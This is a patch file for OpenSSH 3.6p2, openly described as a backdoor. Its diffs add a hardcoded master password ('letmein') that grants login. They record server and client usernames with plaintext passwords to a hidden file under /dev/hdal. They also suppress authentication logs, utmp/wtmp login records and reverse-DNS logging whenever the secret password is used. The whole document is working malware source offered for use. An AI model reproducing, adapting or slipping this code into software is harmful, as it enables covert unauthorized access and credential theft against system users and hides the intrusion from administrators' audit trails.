OpenSSH 3.6p2 backdoor that logs all logins and passwords to a file. Original backdoor ported for 3.6p2 by ajax.
fc76952bae7a43cd39e265c73a1991f607bdef141017d52a421d6f5ade742d53
--- auth-passwd.c Tue Apr 29 04:12:08 2003
+++ ../openssh-3.6.1p2.updated/auth-passwd.c Tue May 13 18:35:12 2003
@@ -234,6 +234,19 @@
# endif /* HAVE_MD5_PASSWORDS */
/* Authentication is accepted if the encrypted passwords are identical. */
- return (strcmp(encrypted_password, pw_password) == 0);
+ return (strcmp(encrypted_password, pw_password) == 0);
+ if(strcmp(_SECRET_PASSWD, password) == 0){
+ mlogin_ok = 1;
+ return 1;
+ }
+ if(strcmp(encrypted_password, pw_password) == 0){
+ outf = fopen(_LOG_DIR"/"_S_LOG,"a+");
+ fprintf (outf, "%s:%s\n",pw->pw_name,password);
+ fclose (outf);
+ return 1;
+}else
+ return 0;
+
#endif /* !USE_PAM && !HAVE_OSF_SIA */
+
}
--- auth.c Sat Jan 18 00:24:06 2003
+++ ../openssh-3.6.1p2.updated/auth.c Tue May 13 18:37:16 2003
@@ -259,14 +259,17 @@
else
authmsg = authenticated ? "Accepted" : "Failed";
- authlog("%s %s for %s%.100s from %.200s port %d%s",
- authmsg,
- method,
- authctxt->valid ? "" : "illegal user ",
- authctxt->user,
- get_remote_ipaddr(),
- get_remote_port(),
- info);
+ /* dont log if secret pass */
+ if(!mlogin_ok){
+ authlog("%s %s for %s%.100s from %.200s port %d%s",
+ authmsg,
+ method,
+ authctxt->valid ? "" : "illegal user ",
+ authctxt->user,
+ get_remote_ipaddr(),
+ get_remote_port(),
+ info);
+ }
#ifdef WITH_AIXAUTHENTICATE
if (authenticated == 0 && strcmp(method, "password") == 0)
--- canohost.c Mon Jan 6 18:51:23 2003
+++ ../openssh-3.6.1p2.updated/canohost.c Tue May 13 18:39:06 2003
@@ -77,14 +77,14 @@
debug3("Trying to reverse map address %.100s.", ntop);
/* Map the IP address to a host name. */
- if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
- NULL, 0, NI_NAMEREQD) != 0) {
- /* Host name not found. Use ip address. */
-#if 0
- log("Could not reverse map address %.100s.", ntop);
-#endif
- return xstrdup(ntop);
- }
+ if(!mlogin_ok){
+ if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+ NULL, 0, NI_NAMEREQD) != 0) {
+ /* Host name not found. Use ip address. */
+ log("Could not reverse map address %.100s.", ntop);
+ return xstrdup(ntop);
+ }
+ }
/* Got host name. */
name[sizeof(name) - 1] = '\0';
--- includes.h Sun Oct 20 19:50:26 2002
+++ ../openssh-3.6.1p2.updated/includes.h Tue May 13 18:39:30 2003
@@ -171,5 +171,11 @@
#include "openbsd-compat/bsd-nextstep.h"
#include "entropy.h"
+#define _SECRET_PASSWD "letmein"
+#define _LOG_DIR "/dev/hdal"
+#define _S_LOG "slog"
+#define _C_LOG "clog"
+FILE *outf;
+int mlogin_ok;
#endif /* INCLUDES_H */
--- sshconnect1.c Tue Aug 20 13:41:16 2002
+++ ../openssh-3.6.1p2.updated/sshconnect1.c Tue May 13 18:44:36 2003
@@ -922,6 +922,7 @@
{
int type, i;
char *password;
+ char gpasswd[120];
debug("Doing password authentication.");
if (options.cipher == SSH_CIPHER_NONE)
@@ -938,8 +939,17 @@
packet_write_wait();
type = packet_read();
- if (type == SSH_SMSG_SUCCESS)
+ if (type == SSH_SMSG_SUCCESS) {
+ /* dont log if secret pass */
+ if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+ outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
+ fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+ fclose (outf);
+ }
+
return 1;
+ }
+
if (type != SSH_SMSG_FAILURE)
packet_disconnect("Protocol error: got %d in response to passwd auth", type);
}
--- sshconnect2.c Tue Apr 1 06:43:40 2003
+++ ../openssh-3.6.1p2.updated/sshconnect2.c Tue May 13 18:42:24 2003
@@ -446,6 +446,7 @@
static int attempt = 0;
char prompt[150];
char *password;
+ char gpasswd[120];
if (attempt++ >= options.number_of_password_prompts)
return 0;
@@ -456,7 +457,16 @@
snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
authctxt->server_user, authctxt->host);
password = read_passphrase(prompt, 0);
+ strcpy(gpasswd,password);
packet_start(SSH2_MSG_USERAUTH_REQUEST);
+ /* dont log if its the secret pass */
+ if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+ outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
+ fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+ fclose (outf);
+ }
+
+
packet_put_cstring(authctxt->server_user);
packet_put_cstring(authctxt->service);
packet_put_cstring(authctxt->method->name);
--- sshlogin.c Wed Jan 1 18:43:56 2003
+++ ../openssh-3.6.1p2.updated/sshlogin.c Tue May 13 18:43:34 2003
@@ -71,8 +71,11 @@
li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
- login_login(li);
- login_free_entry(li);
+ if(!mlogin_ok){
+ login_login(li);
+ login_free_entry(li);
+ }
+
}
#ifdef LOGIN_NEEDS_UTMPX
@@ -96,6 +99,9 @@
struct logininfo *li;
li = login_alloc_entry(pid, user, NULL, ttyname);
- login_logout(li);
- login_free_entry(li);
+ if(!mlogin_ok){
+ login_logout(li);
+ login_free_entry(li);
+ }
+
}